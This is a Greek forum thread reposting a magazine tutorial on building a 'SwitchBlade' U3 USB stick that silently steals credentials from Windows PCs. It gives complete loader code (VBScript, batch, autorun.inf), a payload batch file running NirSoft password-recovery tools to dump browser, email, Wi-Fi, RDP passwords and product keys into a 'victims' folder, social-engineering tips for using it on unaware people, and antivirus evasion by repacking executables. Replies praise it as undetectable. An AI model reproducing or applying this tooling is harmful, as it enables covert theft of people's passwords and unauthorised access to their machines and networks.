Jump to content

Recommended Posts

Posted

Το συγκεκριμένο topic το έχω βρει από ένα συνδρομητικό περιοδικό και αποφάσισα να το αναρτήσω εδώ διότι μιλάει πως με ένα usb μπορείς να πάρεις διάφορες πληροφορίες από το pc ενός άλλου χωρίς καν να καταλάβει ότι του τις παίρνεις μιας και όταν συνδέσεις το usb δεν εμφανίζει απολύτως τίποτα.Ποιο αναλυτικά παρακάτω:

 

Η φυσική πρόσβαση παραμένει ο πιο αποδοτικός τρόπος για κάποιον που θέλει να… δανειστεί πολύτιμες πληροφορίες από ένα ξένο μηχάνημα. Πολλές φορές όμως, οι ευκαιρίες για φυσική πρόσβαση είναι -εκτός από σπάνιες- και χρονικά περιορισμένες, με τον επίδοξο ληστή να έχει στην διάθεσή του μόλις λίγα λεπτά απαρατήρητης πρόσβασης στον «δανεικό» υπολογιστή.

 

Το SwitchBlade είναι ένα ειδικά διαμορφωμένο USB stick, το οποίο διευκολύνει σημαντικά αυτού του είδους τις επιθέσεις σε υπολογιστές με Windows. Ο επιτιθέμενος αρκεί απλά να το συνδέσει σε μια ελεύθερη θύρα του υπολογιστή, να περιμένει μερικά δευτερόλεπτα και να το αφαιρέσει, σίγουρος πλέον ότι όσες ευαίσθητες πληροφορίες ήθελε να «τραβήξει» από το μηχάνημα έχουν αποθηκευτεί ήδη μέσα στο stick αυτόματα, χωρίς ο ίδιος να ακουμπήσει πληκτρολόγιο και ποντίκι ή να έχει οποιαδήποτε άλλη αλληλεπίδραση με τον υπολογιστή. Γρήγορο, αποδοτικό και χωρίς καν ένα δαχτυλικό αποτύπωμα. Ενδιαφέρον; Read on…

 

Η λειτουργία ενός SwitchBlade βασίζεται σε δύο υποσυστήματα, αυτό που είναι υπεύθυνο για την αυτόματη εκκίνηση των διαδικασιών (loader) και εκείνο που αποτελείται από τα εργαλεία που είναι υπεύθυνα για τις διαδικασίες αυτές (payload). Με λίγα λόγια, όταν το SwitchBlade συνδέεται στη θύρα USB ενός υπολογιστή με Windows, αρχικά ο loader αναλαμβάνει να ξεγελάσει το σύστημα AutoRun/AutoPlay του λειτουργικού ώστε να εκτελεστεί αυτόματα το payload. Το δε payload αναλαμβάνει να εκτελέσει τις κακόβουλες διαδικασίες που επιθυμεί ο δημιουργός του SwitchBlade, όπως υποκλοπές ευαίσθητων πληροφοριών (π.χ. passwords ή συγκεκριμένα αρχεία), δημιουργία κερκόπορτας (π.χ. εγκατάσταση trojan ή κάποιου remote access server όπως το vnc ή δημιουργία ενός νέου, κρυφού user account στα Windows) ή ότι άλλο βάλει ο νους του.

Image04_thumb.png

Για να φτάσουμε στην κατασκευή του δικού μας SwitchBlade πρέπει πρώτα να δούμε πως λειτουργεί το σύστημα AutoRun/AutoPlay των Windows, το σύστημα U3 SmartDrive και στην συνέχεια να φτιάξουμε τα δικά μας loader και payload. Ας πάρουμε όμως τα πράγματα με την σειρά.

 

Windows & AutoRun/AutoPlay

 

Το σύστημα AutoRun πρωτοεμφανίστηκε στα Windows95 με σκοπό την αυτόματη εκτέλεση εφαρμογών τοποθετημένων σε αφαιρούμενα αποθηκευτικά μέσα, όταν τα μέσα αυτά συνδέονταν με τον υπολογιστή. Τον καιρό εκείνο βέβαια το πρωτόκολλο USB ήταν στα γεννοφάσκια του και δεν υπήρχαν ακόμα εξωτερικές μονάδες αποθήκευσης USB και έτσι ως αφαιρούμενα αποθηκευτικά μέσα νοούνταν αποκλειστικά τα οπτικά μέσα, δηλαδή τα CD και αργότερα τα DVD.

Το σύστημα AutoRun δούλευε απλά. Ο δημιουργός του CD/DVD έπρεπε να τοποθετήσει ένα αρχείο με όνομα autorun.inf στον γονικό φάκελο του δίσκου. Μέσα σε αυτό το απλό αρχείο κειμένου έπρεπε, μεταξύ άλλων δευτερευόντων οδηγιών, να περιέχεται και η οδηγία για το εκτελέσιμο αρχείο που περιέχεται στον δίσκο και το οποίο πρέπει να τρέξει αυτόματα όταν το δισκάκι εισαχθεί στον οδηγό ανάγνωσης. Για παράδειγμα, το αρχείο autorun.inf που υπάρχει στο CD εγκατάστασης του παιχνιδιού StarCraft έχει τα εξής περιεχόμενα:

[autorun]
OPEN=SETUP.EXE
ICON=SC.ICO

Όταν ο χρήστης βάλει το CD αυτό στο drive, τα Windows διαβάζουν το αρχείο autorun.inf και σύμφωνα με την δεύτερη γραμμή εκτελούν το αρχείο SETUP.EXE που βρίσκεται στο CD αυτόματα, ενώ σύμφωνα με την τρίτη γραμμή αναθέτουν το εικονίδιο SC.ICO ως εικονίδιο του συγκεκριμένου drive στον Explorer.

Με αυτόν τον τρόπο λειτουργίας, οποιοσδήποτε μπορεί να δημιουργήσει πανεύκολα ένα CD/DVD που να εκτελεί αυτόματα κακόβουλες εργασίες όταν εισάγεται στο drive. Με το πέρασμα του χρόνου όμως και την έλευση των επόμενων εκδόσεων Windows, καθώς και τα Service Pack τους και τα διάφορα HotFix που εξέδωσε η Microsoft, το σύστημα AutoRun άλλαξε σημαντικά την προκαθορισμένη συμπεριφορά του. Η συμπεριφορά αυτή μάλιστα διαφοροποιείται και σε επίπεδο τύπου αφαιρούμενης συσκευής με το λειτουργικό να αντιδρά διαφορετικά όταν εισάγεται λόγου χάρη ένα CD σε ένα drive ή όταν συνδέεται ένας εξωτερικός δίσκος USB στο μηχάνημα. Και σαν να μην έφτανε αυτό, τα πράγματα έγιναν ακόμα πιο περίπλοκα όταν – από τα Windows XP και μετά – το σύστημα AutoRun κατέληξε υποσύστημα του ευρύτερου συστήματος AutoPlay, το οποίο κατά την εισαγωγή ενός αφαιρούμενου μέσου στον υπολογιστή, σαρώνει τα περιεχόμενα με σκοπό να αναγνωρίσει τον τύπο τους και στην συνέχεια εμφανίζει στον χρήστη ένα μενού με προτεινόμενες ενέργειες ανάλογα με τα ευρήματα.

Image01_thumb.pngImage02_thumb.png

Ο πίνακας που ακολουθεί συνοψίζει την προκαθορισμένη συμπεριφορά του συστήματος AutoRun/AutoPlay στις πιο πρόσφατες εκδόσεις των Windows και για τους διαφορετικούς τύπους αφαιρούμενων αποθηκευτικών μέσων:

pinakas.png

Όπως φαίνεται στον πίνακα η δημιουργία ενός οπτικού δίσκου με περιεχόμενο που εκτελείται αυτόματα, χωρίς ανθρώπινη παρέμβαση είναι πολύ πιο εύκολη από την δημιουργία ενός αντίστοιχου USB Stick. Το μοναδικό πρόβλημα παρουσιάζεται στα Windows Vista, αλλά ακόμα και εκεί, το πρόβλημα μπορεί να ξεπεραστεί εύκολα με ελάχιστη αλληλεπίδραση από τον χρήστη μέχρι να επιλέξει την πρώτη επιλογή στο μενού του AutoPlay (δείτε τη σχετική εικόνα). Και πιθανότατα αυτό να μην χρειαστεί καν, αν ο νόμιμος χρήστης του υπολογιστή είχε επιλέξει να γίνεται αυτόματα αυτή η διαδικασία την τελευταία φορά που έβαλε ένα δισκάκι με δικό του autorun.inf, όπως π.χ. ένα παιχνίδι.

Απεναντίας, κατά την σύνδεση ενός USB stick που περιέχει autorun.inf, τίποτα δεν θα εκτελεστεί αυτόματα σε καμία έκδοση των Windows, εκτός και αν ο νόμιμος χρήστης έχει κάνει κάποιες αρκετά εξεζητημένες αλλαγές στην registry (πρέπει να το ζητάει ο οργανισμός του!).

Μα εμείς θέλουμε να φτιάξουμε ένα SwitchBlade και όχι κάποιο CD! Έτσι δεν είναι; Πρόβλημα λοιπόν; Για να δούμε…

Σύστημα U3 SmartDrive

 

Το σύστημα U3 είναι ένα σύστημα φορητών εφαρμογών (portable apps) για USB stick. Τα USB stick που υποστηρίζουν την συγκεκριμένη τεχνολογία περιέχουν το πρόγραμμα U3 Launchpad που δρα παρόμοια με το μενού Start των Windows, εμφανίζοντας τις φορητές εφαρμογές που έχουν εγκατασταθεί στο stick (και είναι συμβατές με το σύστημα U3) ενώ δίνει στον χρήστη την δυνατότητα να κατεβάσει και να εγκαταστήσει νέες φορητές εφαρμογές από τον ειδικό ιστοτόπο (www.u3.com).

Για την δική μας εφαρμογή ωστόσο, η ορθόδοξη χρήση του συστήματος U3 δεν μας ενδιαφέρει καθόλου και έτσι τα παραπάνω είναι ασήμαντα. Αυτό που παρουσιάζει ενδιαφέρον είναι τα ίδια τα USB stick που υποστηρίζουν την τεχνολογία U3, ως hardware.

Κατά την σύνδεσή τους με τον υπολογιστή, τα κοινά USB stick αναγνωρίζονται ως μονάδες μαζικής αποθήκευσης (mass storage device) και το μοναδικό filesystem που περιέχουν γίνεται -beep-t από τα Windows. Όμως ένα stick που υποστηρίζει το σύστημα U3 αναγνωρίζεται από τον υπολογιστή ως ένα USB Hub το οποίο έχει πάνω του συνδεδεμένες δύο συσκευές:

 

μια μονάδα μαζικής αποθήκευσης (ώστε να λειτουργεί ως ένα κοινό USB stick)

μια εξωτερική μονάδα ανάγνωσης CD

 

Έτσι, μετά την σύνδεση ενός U3 stick σε ένα Windows υπολογιστή, στον Explorer εμφανίζονται δύο νέα drive αντί για ένα. Το πρώτο έχει την μορφή αφαιρούμενου δίσκου και λειτουργεί αναμενόμενα. Το δεύτερο είναι ένα CD Drive, στο οποίο μάλιστα έχει εισαχθεί και δίσκος CD! Αν επιλέξετε να δείτε τα περιεχόμενα αυτού του εικονικού CD, θα ανακαλύψετε ότι περιέχει το πρόγραμμα U3 LaunchPad του συστήματος U3.

Αυτό που πραγματικά συμβαίνει είναι ότι το σύστημα U3 δεσμεύει ένα μικρό μέρος του χώρου από το ειδικό stick για να αποθηκεύσει το image ενός CD που περιέχει το LaunchPad. Κατά την σύνδεση του stick στον υπολογιστή, το firmware του ειδικού αυτού stick κάνει -beep-t το image αυτό στην εικονική μονάδα ανάγνωσης CD που δημιουργεί στον υπολογιστή.Image03_thumb.png

 

Το concept

 

Ήδη πρέπει να έχετε αρχίσει να μυρίζεστε την συλλογιστική:

 

1)Η δημιουργία CD που εκτελεί αυτόματα κακόβουλες εργασίες δεν ενδιαφέρει γιατί δεν υπάρχει η δυνατότητα εγγραφής των κλεμμένων πληροφοριών.

2)Έτσι, προτιμάται ένα αντίστοιχο USB stick.

3)Αλλά παρότι το AutoRun είναι «τρύπιο» όσον αφορά στα CD, έχει αυστηρή πολιτική για τις συσκευές USB.

4)Όμως υπάρχει ένα ειδικό USB stick, το U3 USB stick, που μπορεί να εξομοιώσει ένα εικονικό CD και να λειτουργεί παράλληλα και ως απλό εγγράψιμο stick.

Αυτό που πρέπει να κάνετε λοιπόν είναι να πάρετε ένα U3 USB Stick, να δημιουργήσετε τα υποσυστήματα loader και payload και να εγκαταστήσετε το πρώτο στο εικονικό CD drive του stick και το δεύτερο στο εγγράψιμο μέρος του stick. Με αυτόν τον τρόπο, κατά την εισαγωγή του SwitchBlade σε ένα υπολογιστή, ο loader θα εκτελείται αυτόματα (αφού θα αναγνωρίζεται ως CD από το AutoRun) και με την σειρά του θα εκτελεί το payload το οποίο θα μπορεί να αποθηκεύσει τα «λάφυρα» αφού εκτελείται από το κανονικό/εγγράψιμο μέρος του stick.

Το μειονέκτημα αυτής της μεθόδου είναι ότι, αν δεν έχετε ήδη, θα πρέπει να προμηθευτείτε ένα ειδικό stick που να υποστηρίζει την τεχνολογία U3. Τα πιο κοινά U3 USB stick είναι τα SanDisk Cruzer Micro, τα οποία έχουν πτυσσόμενο φις USB σε στυλ στιλέτου, γεγονός που χάρισε στο SwitchBlade το όνομά του. Η τιμή ενός U3 USB stick πάντως είναι στα ίδια επίπεδα με ένα απλό stick.

 

Ο Loader

 

Η απλή δουλειά του loader είναι, αφού ενεργοποιηθεί, να εκτελέσει κατευθείαν το payload. Για τα Windows όμως, το payload βρίσκεται σε διαφορετική (εικονική) συσκευή από τον loader, δηλαδή σε διαφορετικό drive letter, το οποίο μάλιστα δεν είναι σταθερό αλλά αλλάζει κάθε φορά που το SwitchBlade θα συνδέεται σε κάποιον άλλο υπολογιστή.

Για να λύσετε αυτό το πρόβλημα, αρκεί να δημιουργήσετε ένα windows script, το οποίο να ψάχνει όλα τα drive letter του υπολογιστή για να βρίσκει το payload και να το εκτελεί. Ανοίξτε λοιπόν τον αγαπημένο σας editor και πληκτρολογήστε τις παρακάτω 11 γραμμές κώδικα:

Set ThisFileSystem = CreateObject("Scripting.FileSystemObject")
For Each objDrive in ThisFileSystem.Drives
  If objDrive.IsReady Then
    If ThisFileSystem.FileExists(objDrive.DriveLetter & ":\switchblade\start.bat") Then
      StartPath = objDrive.DriveLetter & ":\switchblade"
      StartBatchFile = StartPath & "\" & "start.bat"
      CreateObject("Wscript.Shell").CurrentDirectory = StartPath
      CreateObject("Wscript.Shell").Run StartBatchFile, 0, False
    End If
  End If
Next

Αποθηκεύστε το αρχείο με όνομα loader.vbs. Το απλό αυτό script ψάχνει ένα-ένα σε όλα τα drive του συστήματος (γραμμή 2) για να βρει αν υπάρχει το αρχείο start.bat στον γονικό φάκελο switchblade (γραμμή 4) και εφόσον υπάρχει το εκτελεί (γραμμή 8).

Τώρα δημιουργήστε ένα batch file που να εκτελεί αυτό το script. Δημιουργήστε νέο αρχείο στον editor σας και πληκτρολογήστε την παρακάτω γραμμή:

wscript .\loader.vbs

Αποθηκεύστε το αρχείο με όνομα setup.bat.

Όταν εκτελείται ένα batch file στα Windows, αυτά εμφανίζουν το παράθυρο της κονσόλας ώστε να εμφανιστεί τυχόν feedback. Θα ήταν καλύτερα αν ούτε ο loader, ούτε το payload εμφάνιζαν κάτι στην οθόνη του υπολογιστή-θύμα.

Ένας τρόπος για να «σωπάσετε» το setup.bat είναι να το μετατρέψετε σε exe. Κατεβάστε το δωρεάν πρόγραμμα Bat To Exe Converter από εδώ. Εκτελέστε το, επιλέξτε το δικό σας start.bat στο πεδίο Batch File, επιλέξτε Invisible Application στο Visibility και κάντε κλικ στο κουμπί Compile. Ένα αρχείο με όνομα setup.exe θα εμφανιστεί στον φάκελο που βρίσκεται και το setup.bat (το οποίο δεν χρειάζεστε πλέον).  Το όνομα δεν επιλέχτηκε τυχαία αφού, όπως είδατε πριν στον πίνακα, το AutoRun των Vista ευνοεί τα αρχεία με όνομα setup νομίζοντας ότι πρόκειται για εγκατάσταση προγράμματος.

Image05_thumb.png

Μένει να δημιουργήσετε και ένα autorun.inf ώστε το setup.exe που μόλις δημιουργήσατε να εκτελείται αυτόματα όταν «εισάγετε» το εικονικό CD, δηλαδή όταν συνδέετε το SwitchBlade. Δημιουργήστε πάλι ένα νέο αρχείο στον editor σας και πληκτρολογήστε τις δύο γραμμές που ακολουθούν:

[Autorun]
open=setup.exe

Αποθηκεύστε το αρχείο ως autorun.inf και ουσιαστικά έχετε δημιουργήσει όλα τα αρχεία που αποτελούν τον loader.

 

Εγκατάσταση του loader στο U3 USB stick

Εδώ υπάρχει το επόμενο πρόβλημα. Όπως είπαμε ήδη, το κομμάτι του U3 USB stick που αναγνωρίζεται από τα Windows ως CD, υπό κανονικές συνθήκες περιέχει το πρόγραμμα U3 Launchpad και δεν είναι εγγράψιμο. Εσείς όμως πρέπει να βάλετε εκεί μέσα τα 3 αρχεία του loader που μόλις δημιουργήσατε.

Για να λύσετε αυτό το πρόβλημα θα πρέπει να χρησιμοποιήσετε το εργαλείο LPInstaller. Η ορθόδοξη χρήση αυτού του εργαλείου είναι να αντικαθιστά το πρόγραμμα U3 Launchpad που είναι εγκατεστημένο στο U3 USB Stick με την τελευταία έκδοση που κυκλοφορεί, την οποία κατεβάζει αυτόματα από μια προκαθορισμένη τοποθεσία στο internet. Εναλλακτικά -και εδώ είναι το ενδιαφέρον-, αν στον ίδιο φάκελο που βρίσκεται το LPInstaller υπάρχει ένα ειδικά ονομασμένο ISO image, το LPInstaller δεν κατεβάζει τίποτα από το internet αλλά αντικαθιστά το CD image που βρίσκεται στο U3 USB stick με αυτό.

Μπορείτε να κατεβάσετε το LPInstaller από το επίσημο site του U3 ή της SanDisk αλλά δυστυχώς στις πιο πρόσφατες εκδόσεις το ενδιαφέρον χαρακτηριστικό που μόλις αναφέρθηκε έχει αφαιρεθεί, οπότε κατεβάστε μια παλαιότερη έκδοση από εδώ

Πρώτα βέβαια θα χρειαστεί να βάλετε τα 3 αρχεία του loader σε ένα ISO image. Αν δεν έχετε ήδη ένα πρόγραμμα που να μπορεί να δημιουργεί ISO image κατεβάστε το δωρεάν εργαλείο Image Master.

Αφού το εγκαταστήσετε και το τρέξετε, ανοίξτε την καρτέλα Write, σύρετε τα loader.vbs, setup.exe και autorun.inf που φτιάξατε από τον Explorer στο Image Master, πατήστε το Save As και δώστε το όνομα loader.iso στο ISO image που θέλετε να δημιουργηθεί, αφαιρέστε το τικ από την επιλογή UDF και, τέλος, πατήστε το κουμπί Build. Κλείστε το Image Maker – το ISO που θέλατε είναι έτοιμο.

Image06_thumb.png

Τώρα πρέπει να το μετονομάσετε κατάλληλα (από loader.iso) για να αναγνωριστεί από το LPInstaller. Συνδέστε το U3 USB Stick σας (αν δεν το έχετε κάνει ήδη) και από το My Computer κάνετε δεξί κλικ πάνω στο εικονικό CD Drive του U3 και επιλέξτε Open για να εμφανιστούν τα αρχεία του CD image που είναι ήδη εγκατεστημένο στο U3 USB Stick και τα οποία θέλετε να αντικαταστήσετε με τα δικά σας. Ένα από τα αρχεία θα ονομάζεται autorun.inf. Ανοίξτε το με τον editor σας και ψάξτε να βρείτε κάποια γραμμή που να γράφει “brand=” και να ακολουθεί κάποιο αλφαριθμητικό (π.χ. στο δικό μας stick υπήρχε η γραμμή “brand=PelicanBFG”).

Image07_thumb.png

Μετονομάστε το loader.iso ώστε να έχει την μορφή:

<αλφαριθμητικό που βρήκατε>-autorun.iso

Για παράδειγμα, αν το αλφαριθμητικό που βρήκατε ήταν PelicanBFG, μετονομάστε το loader.iso σε PelicanBFG-autorun.iso.

Αν για οποιοδήποτε λόγο στο υπάρχον CD Image δεν βρείτε αρχείο autorun.inf ή μέσα σε αυτό δεν βρείτε την γραμμή με το “brand=” (για παράδειγμα στην περίπτωση που έχετε ήδη αντικαταστήσει μια φορά το CD image με ένα δικό σας) μετονομάστε το loader.iso σε cruzer-autorun.iso.

Αφού το ISO αρχείο σας έχει πλέον το σωστό όνομα, αντιγράψτε το στον ίδιο φάκελο που κατεβάσατε το LPInstaller.exe και εκτελέστε το τελευταίο. Αφού πατήσετε μερικές φορές Next στον wizard που θα εμφανιστεί, το CD image του U3 USB Stick θα αντικατασταθεί με το δικό σας. Κλείστε το LPInstaller και επιβεβαιώστε μέσω του Explorer ότι τα 3 αρχεία του loader σας βρίσκονται πλέον στο εικονικό CD Drive του U3 USB Stick σας.

Image08_thumb.png

Σε αυτό το σημείο, μιας και αφαιρέσατε πλέον το U3 Launchpad, καλά είναι να αδειάσετε και το εγγράψιμο μέρος του U3 USB stick από τα υπόλοιπα αρχεία του συστήματος U3 που είναι πια άχρηστα. Εκεί θα εγκατασταθεί το payload.

Posted

Το Payload

Εδώ η φαντασία σας μπορεί να οργιάσει και να σχεδιάσετε ένα payload από αθώο έως πραγματικά κακόβουλο. Ο μόνος περιορισμός, σύμφωνα με το loader που δημιουργήσατε, είναι ότι το payload πρέπει να βρίσκεται στον φάκελο switchblade του U3 USB stick και να ξεκινά μέσω ενός batch file με όνομα start.bat.

Μια καλή ιδέα λόγου χάρη είναι να χρησιμοποιήσετε τα εργαλεία ανάκτησης password της Nirsoft.

Αρχικά πλοηγηθείτε στην σελίδα Nirsoft Panel και κατεβάστε τα εκτελέσιμα των ChromePass, Dialupass, IE PassView, Mail PassView, MessenPass, Network Password Recovery, PasswordFox, ProduKey, Remote Desktop PassView και WirelessKey View. Τα προγράμματα αυτά μπορούν να ανακτήσουν:

1)λογαριασμούς από διάφορες online υπηρεσίες όπου ο browser του θύματος (ΙΕ, Firefox, Chrome) έχει ρυθμιστεί να «θυμάται» το password (π.χ. θα πάρετε τα password από Gmail, Hotmail, Facebook, MySpace, Twitter, RapidShare και λοιπές online υπηρεσίες)

2)λογαριασμούς από συνδέσεις dialup (π.χ. αν το θύμα έχει DSL modem αντί για modem/router, θα πάρετε το λογαριασμό του)

3)λογαριασμούς από συνδέσεις του τοπικού δικτύου

4)λογαριασμούς email του θύματος αν αυτός χρησιμοποιεί Outlook, Outlook Express, Windows Mail, Thunderbird, Eudora, Incredimail ή διάφορες online υπηρεσίες

5)λογαριασμούς από τις εφαρμογές Instant Messaging που χρησιμοποιεί το θύμα (Windows/MSN/Live Messenger, ICQ, Google Talk, AOL Messenger, Trillian, Miranda, GAIM)

6)password από τον Remote Desktop Server του θύματος αν τον έχει ενεργοποιήσει (έτσι θα μπορείτε να χειρίζεστε το μηχάνημά του εκ των υστέρων απομακρυσμένα)

7)κλειδιά από αποθηκευμένα ασύρματα δίκτυα (έτσι θα μπορείτε μετά να συνδέεστε σε όλα τα ασύρματα δίκτυα που έχει πρόσβαση το θύμα, συμπεριλαμβανομένου του σπιτικού δικτύου του)

8)product key από τις εφαρμογές Microsoft που είναι εγκατεστημένες στο σύστημα του θύματος (π.χ. τα Windows, το Office, το Visual Studio κ.λπ.)

Για να τα βάλετε στο payload, δημιουργήστε ένα φάκελο με το όνομα switchblade στο U3 USB stick και αντιγράψτε τα 10 εκτελέσιμα που κατεβάσατε μέσα σε αυτόν. Στην συνέχεια ανοίξτε πάλι τον editor σας και πληκτρολογήστε τις 16 παρακάτω γραμμές:

@echo off
set foldername=\switchblade\victims\%computername%-%username%
if not exist %foldername% goto createvictimfolder
rd %foldername% /S /Q
:createvictimfolder
md %foldername%
iepv /shtml %foldername%\InternetExplorerPasswordsReport.html
passwordfox /shtml %foldername%\FirefoxPasswordsReport.html
chromepass /shtml %foldername%\ChromePasswordsReport.html
mailpv /shtml %foldername%\MailAccountsPasswordReport.html
mspass /shtml %foldername%\InstantMessengerPasswordReport.html
dialupass /shtml %foldername%\DialupPasswordReport.html
netpass /shtml %foldername%\NetworkPasswordReport.html
wirelesskeyview /shtml %foldername%\WirelessNetworkPasswordReport.html
rdpv /shtml %foldername%\RemoteDesktopPasswordReport.html
produkey /shtml %foldername%\ProductKeyReport.html

Αποθηκεύστε αυτό το batch file ως start.bat στον φάκελο switchblade που δημιουργήσατε πριν λίγο. Αρχικά (γραμμή 2), το start.bat καθορίζει την τοποθεσία που θα αποθηκευτούν τα προϊόντα της υποκλοπής. Για κάθε υπολογιστή στον οποίο θα εκτελείται, θα δημιουργεί (γραμμή 6) τον υποφάκελο με όνομα [όνομα υπολογιστή]-[όνομα χρήστη], μέσα στον υποφάκελο victims του φακέλου switchblade. Έτσι, αν λόγου χάρη συνδέσετε το SwitchBlade σε ένα υπολογιστή με όνομα DellPC την ώρα που ο ενεργός χρήστης είναι ο Peter, οι πληροφορίες του Peter θα βρίσκονται μετά στον φάκελο /switchblade/victims/DellPC-Peter.

Πριν γίνει αυτό, ελέγχεται μήπως ο φάκελος αυτός υπάρχει ήδη (γραμμή 3) οπότε το SwitchBlade έχει χρησιμοποιηθεί ξανά στον ίδιο υπολογιστή/χρήστη και τότε ο συγκεκριμένος φάκελος αδειάζει (γραμμή 4) για να μπουν τα ενημερωμένα αρχεία.

Αφού ο ειδικός φάκελος για τον συγκεκριμένο υπολογιστή/χρήστη δημιουργηθεί ή αδειάσει, οι γραμμές 7-16 εκτελούν ένα-ένα τα εργαλεία της NirSoft με παράμετρο να αποθηκευτούν τα αποτελέσματα ως αναφορές HTML στον νέο φάκελο.

Ο τρόπος που καλείται το start.bat από τον loader (γραμμή 8 στο loader.vbs) καθιστά σίγουρο ότι η εκτέλεση του αρχείου δεν θα εμφανίσει την κονσόλα των Windows και ότι το start.bat θα εκτελεστεί «σιωπηλά» οπότε τώρα δεν χρειάζεται να επαναλάβετε τις «αλχημείες» που κάνατε για το setup.bat του loader.

Με την αποθήκευση του start.bat, το payload σας είναι πλέον έτοιμο και λειτουργικό.

 

Χρήση

Η εκτέλεση του συγκεκριμένου payload δεν διαρκεί πάνω από 5~10 sec. Βρείτε ένα αφύλακτο PC, καρφώστε το SwitchBlade, περιμένετε μέχρι το LED κατάστασης να σταματήσει να αναβοσβήνει, οπότε θα έχει τελειώσει η εγγραφή δεδομένων, και τραβήξτε το. Επαναλάβετε για όσους υπολογιστές θέλετε.

Image09_thumb.png

Πολλές φορές το PC δεν χρειάζεται καν να είναι αφύλακτο. Χρησιμοποιήστε social engineering. Ζητήστε από το θύμα να βάλετε ένα λεπτό το στικάκι σας στον υπολογιστή του για να του μεταφέρετε ένα καινούργιο τραγούδι ή κάτι παρόμοιο (μην ξεχνάτε ότι το SwitchBlade παραμένει ένα stick σαν όλα τα άλλα και μπορείτε να αποθηκεύετε μέσα ότι άλλο θέλετε). Ακόμα και αν το θύμα παρακολουθήσει την όλη διαδικασία δεν θα παρατηρήσει τίποτα περίεργο αφού ούτε ο loader, ούτε το payload εμφανίζουν κάτι στην οθόνη. Μπορείτε να κλέβετε τις προσωπικές πληροφορίες του θύματος μπροστά στα μάτια του!

Όταν πάτε στο δικό σας υπολογιστή, κρατήστε πατημένο το πλήκτρο Shift την ώρα που συνδέετε το SwitchBlade πάνω του για να απενεργοποιήσετε το AutoRun και να αποτρέψετε την αυτόματη εκτέλεση του loader. Ανοίξτε τον Explorer και πηγαίνετε στον φάκελο /switchblade/victims για να δείτε «τι ψάρια πιάσατε»!.

Το θύμα έχει antivirus; Μην απελπίζεστε…

 

Τα εργαλεία της NirSoft που χρησιμοποιήσατε στο payload δεν προορίζονται για κακόβουλη χρήση αλλά επειδή κάποιοι, όπως εσείς ακολουθώντας τα βήματα αυτού του άρθρου, τα χρησιμοποιούν σε κάποιες… ας πούμε… ανορθόδοξες εφαρμογές, κάποιοι κατασκευαστές antivirus αποφάσισαν ότι τα συγκεκριμένα εργαλεία πρέπει να εντοπίζονται από τα antivirus ως malware. Και αυτό, όπως καταλαβαίνετε, δεν είναι ότι καλύτερο για το SwitchBlade που δημιουργήσατε, εκτός και αν δεν έχετε πρόβλημα να το συνδέσετε σε ένα υπολογιστή και να ξεκινήσουν οι σειρήνες!

Ένας τρόπος για να το αποφύγετε αυτό είναι να μην χρησιμοποιήσετε τα συγκεκριμένα εργαλεία στο δικό σας payload. Εκτός από τις πολλές διαφορετικές εφαρμογές payload, υπάρχουν και πολλοί διαφορετικοί τρόποι για να γίνει η ίδια εφαρμογή.

Ας υποθέσουμε όμως ότι «μουλαρώσατε» και θέλετε σώνει-και-καλά να χρησιμοποιήσετε τα εργαλεία της NirSoft. Υπάρχει ένας εύκολος τρόπος να «μασκαρέψετε» τα εργαλεία και να κοροϊδέψετε έτσι τα (περισσότερα) antivirus ώστε να μην τα εντοπίζουν.

Πρόκειται για την παραδοσιακή μέθοδο με την χρήση κάποιου EXE packer, δηλαδή ενός προγράμματος που συμπιέζει εκτελέσιμα αρχεία. Βλέπετε, συμπιέζοντας ένα binary αρχείο, το περιεχόμενό του γίνεται τελείως διαφορετικό και τα antivirus δεν εντοπίζουν το signature που ψάχνουν. Βέβαια, τα σύγχρονα antivirus γνωρίζουν τους αλγορίθμους των πλέον δημοφιλών EXE packer και μπορούν να αποσυμπιέσουν τα εκτελέσιμα και να εντοπίσουν πάλι το signature. Οπότε πρέπει να χρησιμοποιήσετε κάποιο ιδιαίτερα νέο ή ιδιαίτερα σπάνιο EXE packer, όπως είναι ο Mpress 1.27(Προσοχή στην έκδοση!).

Όμως πριν ξεκινήσετε να συμπιέζετε τα εκτελέσιμα της NirSoft με το MPress, πρέπει πρώτα να τα αποσυμπιέσετε γιατί είναι ήδη συμπιεσμένα με τον UPX, που είναι ίσως ο δημοφιλέστερος EXE Packer. Έτσι, θα χρειαστεί να κατεβάσετε και την τελευταία έκδοση του UPX

Αφού κατεβάσετε τους δύο EXE packer, ρίξτε το mpress.exe και το upx.exe στον φάκελο που έχετε τα εκτελέσιμα της NirSoft (τον φάκελο του payload), ανοίξτε μια κονσόλα τερματικού και πλοηγηθείτε στον συγκεκριμένο φάκελο. Για κάθε ένα από τα εκτελέσιμα της NirSoft δώστε τις εντολές:

upx -d [όνομα εκτελέσιμου αρχείου]
mpress [όνομα εκτελέσιμου αρχείου]

Στο τέλος της διαδικασίας τα εργαλεία της NirSoft θα έχουν αλλάξει EXE packer και θα εντοπίζονται από πολύ λιγότερα AntiVirus απ’ ότι αρχικά.

Image11_thumb.png

Για να δείτε την αποτελεσματικότητα της μεθόδου, αλλά και για να ξέρετε με ποια συγκεκριμένα antivirus ενδέχεται να έχετε πρόβλημα, χρησιμοποιήστε την online υπηρεσία VirusTotalπου μπορεί να ελέγξει για ιούς ένα αρχείο της επιλογής σας με 41 διαφορετικά antivirus.

 

Και εδώ τελειώσαμε!Ελπίζω να βοήθησα με αυτό το topic και συγνώμη που έκανα reply για να συνεχίσω αλλά δεν με χώραγε :P

Credits:deltahacker.gr

  • 2 weeks later...
Posted

Η αλήθεια είναι πως είναι πολλά αλλά αυτά είναι για να κάνεις ένα καλό usb stealer να φαίνεται ως ένα απλό flashaki και παράλληλα να κλέβει πληροφορίες χωρίς να πατήσεις τίποτα.Και φυσικά δεν αναγνωρίζετε ως ιός από τα περισσότερα antivirus!

  • 3 weeks later...
  • 1 month later...
  • 4 weeks later...
Posted

μπορείς να το ρυθμίσεις να παίρνει ότι γουστάρεις. Από κωδικούς μέχρι και να του περάσει ιό μέσα χωρίς να το καταλάβει!

Το θέμα είναι εσύ τι θέλεις να κάνεις ;)

  • 1 month later...
  • 8 months later...
  • 6 months later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...